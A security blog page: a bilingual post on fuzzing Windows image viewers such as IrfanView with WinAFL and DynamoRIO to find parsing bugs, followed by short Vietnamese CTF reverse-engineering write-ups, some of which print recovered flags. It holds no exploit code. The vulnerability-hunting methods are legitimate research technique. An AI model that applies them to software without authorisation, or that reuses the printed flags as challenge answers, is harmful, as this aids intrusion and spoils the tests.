🔒
There are new articles available, click to refresh the page.
Before yesterdayResearch - Individuals

Start fuzzing, Fuzz various image viewers

24 May 2020 at 08:16
By: linhlhq

I will return to writing about what I have done in the past year, it has been 2 years since I came back to the blog. This article I will share the fuzzing experience I have learned through the process of using common fuzzer to find bug in non-source products. The environment I learn is Windows, the fuzzer I usually use is targeted at products on this environment. In this article, I will use a popular fuzzer called Winafl to find errors in popular image viewers such as Irfanview [1], Fast Stone [2], Xnview [3], etc.


Introduction


I will not elaborate on Winafl's architecture, nor how to use it. I will leave some links [4] [5] mentioning these issues at the end of the article, anyone interested can read it.


Why did I choose Image Viewers to approach fuzz? We can say file format fuzzing is a fuzzing direction is almost the most popular today. It takes little time to prepare, accessible, easy to find corpus (depending on the case),... and maybe logic parsing these file formats still have very high errors.


Here I will take an example of Irfanview, how I approach and use fuzzer to find errors parsing Irfanview image formats.


Reverse and understand


We can see Irfanview handles many image file formats. Some formats will be handled in the i_view32.exe program, some other file formats will be handled through plugins deployed through DLLs.


We need to understand how the flow of image files is pushed in. The reverse process to understand that logic is quick or slow, difficult, or easy depending on the complexity of each program. With complex programs, it will take a lot of time.


However in this case I will use DynamoRIO [6] (a tool used to calculate the coverage of the program when it executes) to support my reverse faster.


Using DynamoRIO with IDA's lighthouse plugin [7], we can tell with input how the program will go, what code to execute. Save a lot of time when reversing.


For example, when Irfanview processes a jpeg2000 image format, the command runs drrun.exe to generate file coverage:

drrun.exe -t drcov -- i_view32.exe _00042.j2k

With this command, DynamoRIO will generate a file containing information about the loaded DLLs and coverage of the program and each DLL file.


Here is an example output file coverage:



We can see the JPEG2000.dll DLL is loaded during the processing of _00042.j2k file.


Now use the lighthouse plugin on IDA to see the results. We can see that the commands highlighted in green are the ones that were executed when i_view32.exe processed the _00042.j2k file.



From there we will trace back the jpeg2000 image processing functions, by finding the related strings is the fastest and most effective way I often use. We can see that i_view32.exe will load library JPEG2000.dll and then call ReadJPG2000_W() function to process the jpeg2000 file.


Let's debug to see the parameters passed into the ReadJPG2000_W() function, we set the breakpoint at the address calling the ReadJPG2000_W() function:

According to the status of the stack at the time the ReadJPG2000_W() function is called, the parameters passed to the function are as follows:

- wchar_t *argv1: the name of the jpeg2000 file needs to be processed.

- int argv2: variable store value 0.

- wchar_t *argv3: a memory of size 2048.

- wchar_t *argv4: a memory of size 2048, initialized by the string "None".

- int argv5, argv6: used to save parameters while parsing jpeg2000 file.


It is very simple, it is possible to build a harness that calls this function and pass the above parameters to parsing a jpeg2000 image file. Because these parameters are completely independent from the program i_view32.exe.


Here is the harness that I wrote:



Run harness with input jpeg2000 file and check its coverage on JPEG2000.dll

Great, it works properly with i_view32.exe's jpeg2000 processing stream.

With this harness we will be able to use it for fuzzing. I use corpus on the GitHub repo:

 - openjpeg

 - go-fuzz-corpus

 - and some corpus from previous fuzz projects.

With lighthouse, we can also see coverage of each function in DLL.


Herewith the file I use the coverage of the ReadJPG2000_W function is only about 34%, of course, this figure is not ideal when fuzz, you need to find a corpus to push this number as high as possible.


Use Winafl to fuzz jpeg2000 with the harness I built above:


Looking at the interface Winafl we should be interested in some of the following parameters:

- exec speed: the number of test cases that can be executed on 1s

- stability: this indicator shows stability during fuzzing. When running Winafl there will be a certain number of iterations on that test case, in theory, the iterations on the same test case the coverage value must not be changed. If this value changes, the stability will not be high.

- map density: this parameter shows the coverage of the target when running with the current test case.


These three parameters must be high to be effective when the fuzz is high [4].


For other image file formats, Irfanview is treated the same as jpeg2000. The plugin responsible for parsing image files has the same functions for processing. In addition to fuzz jpeg2000 file format I also tried with other formats such as gif, dicom, djvu, ani, dpx, wbmp, webp, ...


Results: CVE-2019-17241, CVE-2019-17242, CVE-2019-17243, CVE-2019-17244, CVE-2019-17245, CVE-2019-17246, CVE-2019-17247, CVE-2019-17248 , CVE-2019-17249, CVE-2019-17250, CVE-2019-17251, CVE-2019-17252, CVE-2019-17253, CVE-2019-17254, CVE-2019-17255, CVE-2019-17256, CVE -2019-17257, CVE-2019-17258, CVE-2019-17259, CVE-2019-17261, CVE-2019-17262


Tips and Tricks


While using Winafl, I found Winafl to be most stable on Windows 7. Windows 10 is very bad, DynamoRIO has some problems with memory on Windows 10 that leads to fuzzer or crash.


When fuzzing, I recommend turning on the Page Heap for the harness, to better detect out-of-bounds and uninitialized memory errors.


Afl-tmin is a useful tool to help you minimize corpus, which will be very helpful with fuzzer during mutate corpus. However I usually do not use it because it is too slow. I think I will try using the halfempty tool [8] to replace afl-tmin in the future.


Speed ​​up: Harness is used to call the Windows API the less DynamoRIO instrument process faster. In the harness I wrote above, in the main function I use the LoadLibraryA function to load the DLL I need fuzz and my target_offset in the main function, it will greatly reduce the running speed of the fuzzer.


There are many workarounds. There are a few ways that I can read and read [9], changing the offset to start the instrument is quite good, but when using this method I check it when run in debug mode with iterator, my fuzzer is unstable, I Do not know why. Here, I use lief [10] to solve this problem. I will load the library I need to fuzz before executing the main function:


                
And this is the result, after this fuzz target, has been fixed my way:

                

Speed has improved, but this is not the best way because the speed depends on the target that you fuzz not only depends on the harness you build. I use it because on Windows there is one more fuzzer, but later I prefer to use it instead of Winafl, the way my library loads before the main function matches the architecture of that fuzzer. The following article I will mention more about that fuzzer more.


Corpus: Many people who are new to fuzz will often think of the most important and hardest to build a harness. For me, searching for corpus is the most difficult problem. Searching for corpus with high coverage is very rare, and with these corpus people often will not share because it is very valuable with fuzzing.


When finding a large corpus you should use winafl-cmin to reduce the number of test cases down. There will be test cases whose coverage is duplicated or included in other test cases.


Conclusion


This is the first target I use to learn fuzzing. When my bugs were submitted and got CVE, there were some who said that I farmed and was CVE grass. I also don't argue with those people, I just care what I do, what I will learn from it. Continuing this series on fuzzing, I will share how I approach and fuzz out the bugs of VMWare, Microsoft,... based on what I said in this article.


[3] https://www.xnview.com/en/

[4] https://www.apriorit.com/dev-blog/644-reverse-vulnerabilities-software-no-code-dynamic-fuzzing

[5] https://symeonp.github.io/2017/09/17/fuzzing-winafl.html

[6] https://github.com/DynamoRIO/dynamorio

[7] https://github.com/gaasedelen/lighthouse

[8] https://github.com/googleprojectzero/halfempty

[9] https://github.com/googleprojectzero/winafl/issues/4

[10] https://github.com/lief-project/LIEF




Vietnamese version


Tôi sẽ quay lại viết lách về những gì mình làm được trong năm vừa qua, cũng đã 2 năm rồi tôi mới quay lại viết blog. Bài viết này tôi sẽ chia sẽ những kinh nghiệm fuzzing mà tôi đúc kết được qua quá trình sử dụng các fuzzer phổ biến để tìm lỗi trong các sản phẩm không có mã nguồn. Môi trường tôi tìm hiểu là Windows, fuzzer tôi thường sử dụng đều target vào các sản phẩm trên môi trường này. Trong bài viết này tôi sẽ dụng một fuzzer phổ biến là Winafl để tìm các lỗi trong các trình image viewers phổ biến như Irfanview [1], Fast Stone [2], Xnview [3],…


Introduction


Tôi sẽ không trình bày quá kĩ về kiến trúc của Winafl, cũng như cách sử dụng nó. Tôi sẽ để 1 số link [4] [5] đề cập đến những vấn đề này ở cuối bài viết, ai quan tâm có thể đọc thử.


Tại sao tôi lại chọn các trình Image Viewers để tiếp cận fuzz. Có thể nói file format fuzzing là một hướng fuzzing gần như là phổ biến nhất hiện nay. Nó mất ít thời gian để chuẩn bị, dễ tiếp cận, dễ tìm corpus (tùy trường hợp),… và có thể logic parsing các định dạng file này vẫn còn tồn tại lỗi rất cao.


Ở đây tôi sẽ lấy ví dụ về Irfanview, cách tôi tiếp cận, sử dụng fuzzer như thế nào để tìm lỗi parsing các định dạng ảnh của Irfanview.


Reverse and understand


Ta có thể thấy Irfanview xử lý rất nhiều định dạng file ảnh. Một số định dạng sẽ được xử lý trong chương trình i_view32.exe, một số định dạng file khác được xử lý qua các plugin được triển khai qua các DLL.


yyyyy

Ta cần hiểu luồng xử lý các file ảnh được đẩy vào như thế nào. Quá trình reverse để hiểu logic đó nhanh hay chậm, khó hay dễ phụ thuộc vào độ phức tạp của từng chương trình. Với những chương trình phức tạp ta sẽ mất khá nhiều thời gian.


Tuy nhiên trong trường hợp này mình sẽ sử dụng DynamoRIO [6] (1 tool được sử dụng để tính coverage của chương trình khi nó thực thi) để hỗ trợ cho việc reverse của mình nhanh hơn.


Sử dụng DynamoRIO kèm plugin lighthouse [7] của IDA, chúng ta có thể biết được với input như thế chương trình sẽ đi như thế nào, sẽ thực thi những dòng lệnh nào. Tiết kiệm một lượng lớn thời gian khi reverse.


Ta lấy ví dụ khi Irfanview xử lý 1 định dạng ảnh jpeg2000, Lệnh chạy drrun để generate ra file coverage:

drrun.exe -t drcov -- i_view32.exe _00042.j2k

Với lệnh này DynamoRIO sẽ sinh ra 1 file chứa thông tin các DLL được load và coverage của chương trình và từng file DLL đó.

Dưới đây là output file coverage ví dụ:


Ta có thể thấy DLL JPEG2000.dll được load vào trong quá trình xử lý file _00042.j2k.

 

Bây giờ hãy sử dụng plugin lighthouse trên IDA để xem kết quả. Ta có thể thấy các lệnh được bôi xanh là những lệnh đã được thực thi khi i_view32.exe xử lý file _00042.j2k.


Từ đó ta sẽ trace ngược về các hàm xử lý ảnh jpeg2000, bằng việc find các string liên quan là cách hiệu quả và nhanh nhất mà tôi thường dùng. Ta có thể thấy i_view32.exe sẽ load library JPEG2000.dll sau đó gọi hàm ReadJPG2000_W() để xử lý file jpeg2000.



Hãy debug để xem các tham số truyền vào hàm ReadJPG2000_W(), ta đặt breakpoint tại địa chỉ gọi hàm ReadJPG2000_W():



Theo trạng thái của stack vào thời điểm function ReadJPG2000_W() được gọi, thì các tham số truyền vào hàm lần lượt như sau:

- wchar_t *argv1: tên của file jpeg2000 cần được xử lý

- int argv2: biến lưu giá trị 0

- wchar_t *argv3: một vùng nhớ có kích thước 2048

- wchar_t *argv4: một vùng nhớ có kích thước 2048, được khởi tạo bởi chuỗi None

- int argv5, argv6: dùng để lưu các thông số trong khi parsing file jpeg2000.


Nó rất đơn giản, ta hoàn toàn có thể xây dựng 1 harness gọi hàm này và truyền các tham số như trên để parsing 1 file ảnh jpeg2000. Vì các tham số này hoàn toàn độc lập so với chương trình i_view32.exe.

Dưới đây là harness mà tôi viết:



Chạy thử harness với input là file jpeg2000 và kiểm tra coverage của nó trên JPEG2000.dll



Tuyệt với nó hoạt động đúng với luồng xử lý jpeg2000 của i_view32.exe.

 

Với harness này ta sẽ có thể sử dụng để fuzzing. Tôi sử dụng corpus trên các repo github:

- Openjpeg

- go-fuzz-corpus

- và 1 số corpus từ các project tôi fuzz trước đó.

Với lighthouse chúng ta còn có thể xem coverage của từng hàm trong DLL.



Ở đây với file tôi sử dụng coverage của hàm ReadJPG2000_W chỉ đạt khoảng 34%, tất nhiên con số này là không lý tưởng khi fuzz, bạn cần tìm các corpus để đẩy con số này lên càng cao càng tốt.

 

Sử dụng Winafl để fuzz jpeg2000 với harness tôi xây dựng ở trên:



Nhìn vào giao diện Winafl chúng ta nên quan tâm 1 số thông số sau:

- exec speed: số testcase thực thi được trên 1s

- stability: chỉ số này thể hiện độ ổn định trong khi fuzzing. Khi thực hiện chạy Winafl sẽ có 1 số lần lặp nhất định trên testcase đó, về lý thuyết thì các lần lặp trên cùng 1 testcase giá trị coverage không được thay đổi. Nếu giá trị này thay đổi dẫn đến độ ổn định sẽ không cao.

-  map density: thông số này thể hiện coverage của target khi run với testcase hiện tại.

3 thông số này phải cao thì hiệu quả khi fuzz mới cao [4].

 

Đối với các định dạng file ảnh khác, irfanview đều xử lý tương tự như jpeg2000. Các plugin phụ trách parsing các file ảnh đều có các hàm tương tự để xử lý. Ngoài fuzz định dạng file jpeg2000 tôi còn thử với các định dạng khác như: gif, dicom, djvu, ani, dpx, wbmp, webp,…

 

Kết quả: CVE-2019-17241, CVE-2019-17242, CVE-2019-17243, CVE-2019-17244, CVE-2019-17245, CVE-2019-17246, CVE-2019-17247, CVE-2019-17248, CVE-2019-17249, CVE-2019-17250, CVE-2019-17251, CVE-2019-17252, CVE-2019-17253, CVE-2019-17254, CVE-2019-17255, CVE-2019-17256, CVE-2019-17257, CVE-2019-17258, CVE-2019-17259, CVE-2019-17261, CVE-2019-17262

 

Tips and Tricks


Trong quá trình sử dụng Winafl, tôi nhận thấy Winafl chạy ổn định nhất trên Windows 7. Windows 10 nó chạy rất tệ, DynamoRIO gặp 1 số vấn đề với memory trên Windows 10 dẫn đến fuzzer hay bị crash.


Khi fuzzing, tôi khuyên bạn nên bật Page Heap cho harness, để phát hiện tốt hơn các lỗi out-of-bounds và các lỗi uninitialized memory.


Afl-tmin là 1 tool hữu ích giúp bạn minimize corpus, sẽ rất hữu ích với fuzzer trong quá trình mutate corpus. Tuy nhiên tôi thường không sử dụng vì nó quá chậm. Tôi nghĩ tôi sẽ thử sử dụng tool halfempty [8] để thay thế afl-tmin trong tương lai.


Tăng tốc độ chạy: Harness được sử dụng call các api của windows càng ít thì quá trình DynamoRIO instrument càng nhanh. Ở harness tôi viết trên, trong hàm main tôi sử dụng hàm LoadLibraryA để load DLL tôi cần fuzz và target_offset tôi để ở hàm main, nó sẽ giảm tốc độ chạy của fuzzer đi nhiều.

Có nhiều cách giải quyết. Có 1 số cách mà tôi tìm đọc được [9], thay đổi offset bắt đầu instrument cũng khá hay, nhưng khi sử dụng cách này tôi kiểm tra nó khi run ở mode debug với iterator thì fuzzer của tôi chạy không ổn định, tôi không biết lý do tại sao. Ở đây, tôi sử dụng lief [10] để giải quyết vấn đề này. Tôi sẽ load library tôi cần fuzz lên trước khi thực thi hàm main:

 


Và đây là kết quả, sau khi fuzz target này, đã được sửa theo cách của tôi:



Tốc độ có cải thiện, tuy nhiên đây không phải là cách hay nhất vì tốc độ còn phụ thuộc vào target mà bạn fuzz không phải chỉ phụ thuộc vào harness mà bạn xây dựng. Tôi sử dụng nó bởi vì trên Windows còn 1 fuzzer nữa mà sau này tôi ưu tiên sử dụng nó thay vì Winafl, cách load library của tôi trước hàm main phù hợp với kiến trúc của fuzzer đó. Các bài viết sau tôi sẽ đề cập nhiều về fuzzer đó nhiều hơn.

 

Corpus: Nhiều người mới tiếp cận fuzz thường sẽ nghĩ xây dựng harness để fuzz quan trọng và khó nhất. Đối với tôi thì tìm kiếm corpus mới là vấn đề nan giải nhất. Tìm kiếm corpus với coverage cao rất hiếm, và với những corpus này thường mọi người sẽ không chia sẻ vì nó rất có giá trị với fuzzing.


Khi tìm được 1 lượng lớn corpus bạn nên dùng winafl-cmin để giảm số lượng testcase xuống. Sẽ có những testcase mà coverage của nó trùng lặp hoặc đã bao hàm trong testcase khác.

 

Conclusion


Đây là target đầu tiên tôi sử dụng để học fuzzing. Khi các bug của tôi được submit và lấy CVE có 1 số người nói rằng tôi farm và là CVE cỏ. Tôi cũng không tranh luận gì với những người đó, tôi chỉ quan tâm việc tôi làm thì tôi sẽ học được những gì từ đó thôi. Tiếp nối loạt bài về fuzzing này, tôi sẽ chia sẻ cách mà tôi tiếp cận và fuzz ra những bug của VMWare, Microsoft,… dựa trên những thứ tôi đã nói trong bài viết này.



[3] https://www.xnview.com/en/

[4] https://www.apriorit.com/dev-blog/644-reverse-vulnerabilities-software-no-code-dynamic-fuzzing

[5] https://symeonp.github.io/2017/09/17/fuzzing-winafl.html

[6] https://github.com/DynamoRIO/dynamorio

[7] https://github.com/gaasedelen/lighthouse

[8] https://github.com/googleprojectzero/halfempty

[9] https://github.com/googleprojectzero/winafl/issues/4

[10] https://github.com/lief-project/LIEF

RedVelvet - 75 pts

6 February 2018 at 09:06
By: linhlhq
Bài này k có gì đặc biệt, nhập flag rồi check từng kí tự:


Các function từ fun1 -> fun15 sẽ check các kí tự của flag. Đoạn antidebug quá rõ nên bypass ezzz.
Khi check hết các function trên thì có nhiều flag, nói là nhiều nhưng chỉ có vài cái thôi, lôi chày cối sub thoải mái chả vấn đề gì. Còn không thì đi tiếp thêm 1 tí có đoạn check hash SHA256. Mình thì mình sẽ sub luôn =)).

Code solution mình code chày cối :( lúc làm mình thấy có hash nên sợ có nhiều đáp án dùng z3 sợ sau này phải tìm thêm kết quả.

easy_serial - 350pts

6 February 2018 at 09:04
By: linhlhq
Đây là 1 challenge theo bản thân mình nghĩ là không văn minh. Hoặc ý đồ của người ra là bắt mình dùng tool để decompiler.
Ban đầu phấn khởi load lên IDA chạy. Dính ngay trick Virtual alarm có vẻ để đọc code mà bypass cái trick này khá rắc rối (không tính đến mấy cái trick tương tự mà chỉ gọi hàm alarm thì quá dễ). Mình đọc code để tìm hàm main của nó thì thấy cái tên khá là lạ “Main_main_infor”,… Search google thì biết được nó được code bằng Haskell. Check lại thì thấy ngay GHC.


Tiếp tục google xem có tool decompiler nó không thì mình tìm được 1 tool link mình để ở đây. Dùng khá dễ. Ngoài ra mình còn tìm được 1 link nó manually decompiler có thể tham khảo thêm cách họ làm. Sau khi decompiler thì nó ra 1 đống thế này đây chắc là opcode tượng trưng vì mình có search tìm cấu trúc của haskell thì nó khác cái đống này.

Cop sang notepad ngồi xem thấy có mấy đoạn text quen thuộc là khả thi rồi =)).

Đên đây thì bài này hết thú vị rồi. Vì nó rõ rành rành là so sánh các kí tự kia rồi. Và đây là script của bài này

Boom - 223pts

6 February 2018 at 08:59
By: linhlhq
Bài này cũng được build đặc biệt multi platform. Nếu debug không quen nhay hết vào các hàm thì sẽ rất mất thời gian.
Ban tổ chức cho bài này quá dài. 1 bài VM mình làm chắc cũng chỉ dài đến tầm này.
Ở trong bài có rất nhiều nhánh. Input nhập vào thì cũng vậy. Mình mới chỉ làm 1 nửa thì dừng vì check server thì thấy đóng mất rồi. Khá tiếc không biết có mở lại hay k.

Vì nó dài nên mình định không viết bài này. Rất ngại đi vào chi tiết. Ở đây mình chỉ làm sơ bộ thì các phần mình đã giải rồi.
Nói qua 1 chút về mục đích của chương trình. Nó sẽ bắt mình nhập 1 chuỗi và kiểm tra nếu đúng nó sẽ đọc 1 file từ /tmp/files/?, và cứ thế đi sâu xuống, nhập đúng càng nhiều thì càng đọc được nhiều file, các file này được đánh số từ 1 -> 13.Chính vì mình chưa làm hết được các nhánh và server tắt rồi nên chưa chắc là file đó sẽ có gì. Có thể là các kí tự của FLAG

1. Đầu tiên khi khởi chạy chương trình, nó sẽ yêu cầu mình nhập 1 chuỗi.

Chuỗi mình nhập sẽ có 3 trường hợp:
Nếu nhập chuỗi “Know what? It's a new day~” thì sang nhánh 1 (mình đặt tên cho dễ viết thôi nhé)
Nếu nhập : ” It's cold outside..” sẽ sang nhánh 2. -> open file /tmp/files/2
Nếu nhâp: “We need little break!” sẽ sang nhánh 3 -> open file /tmp/files/3
 Mình sang nhánh 1 => mở và đọc file /tmp/files/1

2. Tiếp theo chương trình sẽ đọc vào 7 số. 7 số này sẽ được chuyển đổi qua 1 chuỗi kí tự và so sánh nếu đúng thì sẽ tiếp tục đọc thêm 1 file. Điều đặc biệt là có đến 3 chuỗi được đem ra so sánh =)).

key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4
key2 = 'w33kend' => [49 15 15 31 1 23 13] => /tmp/files/5
key3 = 'pand0ra' => [57 14 23 13 50 7 14] => /tmp/files/6
Cả 3 dãy số trên đều đúng tuy nhiên mỗi dãy mở ra 1 file khác nhau. Rối rắm vc

3. Tiếp theo chương trình sẽ yêu cầu nhập 1 số và sẽ check số đó thong qua hàm main::fun12

If(main::fun12(0,number)==0x6b) => true
Cái điều kiện đó có rất nhiều số thỏa mãn nhé.Sau khi nhập đúng nó tiếp tục mở 1 file /tmp/files/13

4. Sau đó nó yêu cầu nhập tiếp 4 số. Đến đây mình đọc code không hiểu cái số đó nó làm gì và khá nản. Nhưng ai ngờ lỗi như nào chương trình này nó in cho mình xem hết.

Mình thử 1 vài input nữa và nhận ra số chỉ từ 1->9. Vậy thì tại sao không brute force =)).
Mình ngồi burte ra 1 số nghiệm thỏa mãn. Ex: 1 3 5 8
Và khi nhập đúng nó tiếp tục mở 1 file /tmp/files/8

5. Tiếp đến là 1 chuỗi để biến đổi và so sánh với “H_vocGfsg4p_xicwcrwexg4r”. Các thuật toán biến đổi mình sẽ có trong code solution.
Khi nhập đúng nó sẽ mở tiếp file /tmp/files/11
Sauk hi xong chuỗi này mình nhận ra rằng nó quay lại cái chỗ nhập 7 số. Và mình đã nhập tiếp các trường hợp còn lại ở trên.
- Đối với trường hợp key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4 thì nó cư vòng vo quay đi quay lại các bước ở trên
- Duy chỉ với TH: key3 = 'pand0ra' => [57 14 23 13 50 7 14] => /tmp/files/6 thì sau đó nó yêu cầu mình nhập 27 số và kiểm tra. Và nó mở thêm 1 file /tmp/files/10
Đến đây mình đã check rất kĩ mà k thấy điều kiện thoát nó cứ vòng vo nhập số lại nhập chuỗi.
Nếu các file kia chứa các kí tự của flag thì chắc mình sẽ khởi chạy 3 lần, để lấy ra ki tự =)).
Thôi chắc đến đây thôi. Nếu server bật lại mình sẽ thử nốt =)). Code mình giải các problem ở đây.

Review nhẹ các bài Reverse ở Codegate

6 February 2018 at 08:51
By: linhlhq
1. RedVelvet – 75 pts
    Đây là 1 bài đơn giản, đơn thuần check các kí tự của flag.
2. Welcome to droid - 125pts
    Bài này mình làm khá tù, mình xem write-up của họ thì patch lại entry point, trong khi mình đi đọc opcode dalvik rồi patch cái hàm random =)). Khá óc nên mình k viết bài này.
3. Boom - 223pts
   Bài này mình làm gần xong thì phát hiện server bị tắt nên dừng luôn. Về cơ bản nó khá là dài và được build củ chuối nữa.
4. easy_serial - 350pts
    Bài này cũng là 1 dạng củ chuối như bài boom. Nhưng nó còn củ chuối hơn nữa là có tool decompiler.
5. 6051 - 880pts
    Đây là challenge mà mình thấy hay nhất mà mình đã làm được trong đống này. Mạng nặng tính thuật toán.
6. CPU - 971pts
    1 Dạng VM có lẽ thế, vì mới xem qua code thì hình giống bài ở mates-round1, cũng bắt nhập opcode để thực thi. Đây cũng là 1 bài connect server vì server tắt nên mình chưa động chi đến nó =)). Ngụy biện =)) có bật chắc cũng khó mà chịch được nó.

Serialme

26 December 2017 at 15:32
By: linhlhq
Đây là 1 dạng bài vm engine. Mình có đọc nhiều writeup của nhiều pro mà họ làm mình đọc không hiểu gì :v. Toàn giải văn minh thôi à.
Mong là sau này mình hiểu rõ hơn cái này để làm. Còn bây giờ mình giải được bài này là nhờ vào cái này
Mình có đọc và tìm hiểu qua về cơ chế của vm_engine.Cái cơ chế của nó tập trung ở vòng lặp “vm_loop”.
Nói qua về cơ chế của bài này. Đề yêu cầu mình nhập 10 số lần lượt, đúng đủ 10 số thì sẽ bung flag ra. Nói đơn giản vậy chứ cái vm_engine kia làm mình rối rắm trong khâu check các số đó lắm.
Cụ thể ở bài này cái vòng lặp vm nó nhìn tổng quát sẽ như thế này đây:

Ở cái vòng lặp này có đến 20 case, mỗi case trong đó cơ bản nó chỉ thực hiện 1 lệnh nào đó ví dụ như add, xor, mov,… Nên mình làm là mình trace trâu bò :v.

case 12: là case minh nhập vào số và xử lý ở đây. Sau khi cái đống code kia xử lý số nhập vào thì giá trị đó được lưu ở eax. Thực ra nếu đi sâu vào thì rắc rối phết. Vì tác giả chuyển đổi kiểu input thành input từ file đâm ra input số vào lại là chuỗi xong chuyển qua chuyển lại mới ra cái giá trị được lưu trong eax kia.
Đến đây thì từng số sẽ được đi qua các case để thực hiện các phép tính toán. Và cuối mỗi lần thực hiện đó nó lại dừng ở case 8 để so sánh. Ta cần làm nó thỏa mãn cái điều kiện ở đây thì mới có thể nhập tiếp được.

Đến đây thì ezz trâu bò ra flag rồi :v.

Debugme

26 December 2017 at 14:57
By: linhlhq
Bài này mình sẽ giải thích sơ qua. Khi mình nhập flag vào, flag sẽ được mang đi mã hóa (AES 256). Sau đó sẽ được xor với 1 chuỗi :v. Đó tất cả đấy =)).
Về điều kiện từng cái như sau: độ dài flag = 9.

Sau đó chương trình sẽ tạo ra 1 thread. Trong thread này sẽ chạy 16 vòng lặp mã hóa. Nhưng đây là troll mình :v. Chạy 16 vòng y hệt nhau không phải gối lên nhau. Chung quy lại cái thread kia chỉ là mã hóa AES flag thôi.

- Đây là source code mã hóa AES. Cái thread này nó đánh lừa mình và làm mình mất khá nhiều thời gian. Như mình nói ở trên đây thực ra chỉ là mã hóa cái flag 1 lần chứ không phải 16 lần. Nhưng khi mình check kết quả sau khi chuỗi mình nhập chạy qua cái thread này nó lại trả giá trị khác với mã hóa 1 lần. Làm mình phân vân loay hoay ^^.
- Sau 1 hồi mình mới để ý cái hàm WaitForMultipleObjectsEx ở ngay dưới Thread.Mình sẽ đặt break point ở trước hàm sleep kia Vì mình kiểm tra gia trị bị thay đổi sau khi chạy qua hàm Sleep

- Để bắt được cái khoảnh khắc đó. Mình đặt 1 hard break point ở địa chỉ lưu trữ kết quả của chuỗi (byte_1D4CA0) và chạy bình thường. Để khi cái hàm làm thay đổi giá trị mã hóa thực hiện thì chương trình của mình sẽ dừng ở đó.
- Và đây là hàm thay đổi giá trị ciphertext, đơn giản là nó xor với giá trị ở xmmword_1A9EF0

- Đến đây là xong rồi ciphertext sau khi xor sẽ được mang đi so sánh với giá trị ở đây

- Tất cả các bước check giá trị ciphertext và plaintext mình thực hiện ở trên trang web: http://aes.online-domain-tools.com/

Unlockme

26 December 2017 at 14:51
By: linhlhq
Bài này là 1 dạng serial, mình sẽ nhập name và key vào. Sau khi biến đổi name và key nó phù hợp theo đúng thuật toán của bài là sẽ có flag thôi :v.
Bài này code khá dài và lằng nhằng. Mình nói qua thuật toán bài này như sau:
- Về phần name, sau khi được nhập vào lần lượt các kí tự sẽ được biến đổi theo đoạn mã giả sau:

Sau khi biến đổi thì giá trị của biến base sẽ được dùng để check key mình nhập
- Về key thì định dạng của key sẽ là xx-xx-xx-xx => leng = 11. Nếu để ý thì sẽ có đoạn check độ dài của key:

Tiếp theo các giá trị ở xx kia sẽ được chuyển trực tiếp thành số. Ví dụ 12-13-3f-4a thì sẽ thành 4 số là 12,13,3f,4a
Các con số này sẽ được mang đi add với từng kí tự trong cái base ở trên kia theo thứ tự ngươc nhau và điều kiện ràng buộc như sau:
base[0] + số thứ 4 == base[1] + số thứ 3 == base[2] + số thứ 2 == base[3] + số thứ 1
(cái thứ tự là mình nói để dễ hình dung thôi nhá còn source code của tác giả có thể văn minh hơn của mình =)))
Khi mình làm đến đây rồi mình cứ nghĩ là ok, ai ngờ ban tổ chức troll lại còn fake flag :v. Sub sai sấp mặt

Tác giả ra đề còn anti debug đoạn in ra flag với hình như bắt mình nhập name phải dài hơn 1 kí tự đoạn này mình sửa luôn thanh ghi để bypass :v
WhiteHat{2f2a1ebcc9f4b69502343e04bc2ae7e185e4c01a}

Writeup Pyc

26 December 2017 at 14:47
By: linhlhq
Sau khi nhận được file mình giải nén thì được file connect.pyc. Cái này dùng tool decompiler để lấy source thôi. Và đây là source nguồn của nó.

Đây là 1 cách thực thi code mà python hỗ trợ, cái đống data kia là 1 dạng binary sau khi được build từ source và có thể thực thi bằng cách marshal.loads như trên.
Đến đây mình có google để tìm hiểu về cái này và thấy đâu đâu cũng chỉ mình cách dùng disassemble của python để biểu diễn cái source kia sang 1 dạng ngôn ngữ tựa asm mà mình có thể hiểu.
Thấy thế mình nghĩ ezz là dis rồi xem cái đó nhưng mà không đơn giản tí nào :v

Phải mất 1 hồi để hiểu được cái cấu trúc của cái đống trong hình =)). Sau đó thì mình code lại cái nội dung mà đoạn mình vừa disassem ra ở trên để cho dễ theo dõi. Link file mình cover lại code

Về cách hoạt động để check flag của nó sau khi mình code lại bằng python cũng không có gì đặc biệt. Flag được tách ra thành 6 cụm mỗi cụm 4 kí tự lần lượt nằm trên các dòng và được lưu trong file có tên là flag.txt. Nó sẽ đọc flag ở trong file và kiểm tra.
Có 3 hàm kiểm tra chính là “xor” ,”check_flag” và “check_str” các nội dung trong file flag.txt sẽ được mang đi kiểm tra qua các hàm này.
Bài này không phải khó ở đoạn getflag mà chắc ý của ban tổ chức là cái đống bycode python mình cần disassembly để hiểu ở trên kia thôi
Mình có viết 1 đoạn Sript để lật ngược lại lấy được các cụm flag cũng dạng là brute thôi :v.
Có nhiều hơn 1 flag với cái Script của mình vì mình chỉ dùng có 2 điều kiện để check flag nhưng khi chạy thì nhìn được ngay đâu là flag đúng thôi :v
{Ch4ll3ngE_V3ry_FUN_R1gHt}

FeelMyPain

26 December 2017 at 14:38
By: linhlhq
Bài này mình méo hiểu ý của ban tổ chức căn bản mình thử cờ nó đúng luôn nên không xem kĩ cái kỹ thuật ở đây là gì. Hình như nó bung ra cái SEH exeption.
Cái lệnh call esi đưa mình đến flag rồi :v

Flag: love_is_the_reason_why_there_is_pain

Writeup re250 (Picaso)

14 December 2017 at 14:00
By: linhlhq
Loay hoay làm bài da-vinci (re150) 1 hồi mãi không hiểu ý của tác giả là gì mặc dù thuật toán bài đó rất rõ ràng.
Quay sang bài picaso(re250) :v không phải chọn nó vì tên mà xem số người làm được thôi.
Ban đầu nhìn dung lượng file này thấy ngờ ngợ (~10mb). Load lên ida mới giật mình thấy toàn là lệnh mov :v. Và đây là dạng mình làm rồi (đề thi chọn đội tuyển của UET).
Đây là 1 dạng obfuscate code với lệnh mov, cái này mà để nguyên debug thì chỉ có sấp mặt
  • Nếu cứ cố chấp trace thì có lẽ sẽ nhìn thấy cái chữ màu vàng trên hình kia khá khá khá nhiều lần :v.
  • Đối với dạng này đầu tiên cần phải deobfuscate được code. Cái này thì mình không biết nhưng thằng khác nó lại biết, còn viết cả code mình chỉ lấy tool nó viết về xài thôi
  • Sau khi demovobfuscate được thì code nhìn cũng không có gì khác biệt vẫn rất nhiều lệnh mov nhưng quan trọng ở chỗ là code bây giờ đã xuất hiện các lệnh JMP trước đó bị làm rối.
  • Đến đây thì giải bài này dễ hơn nhiều rồi, vì là đã làm rối code nên cái check flag của bài này rất đơn giản.
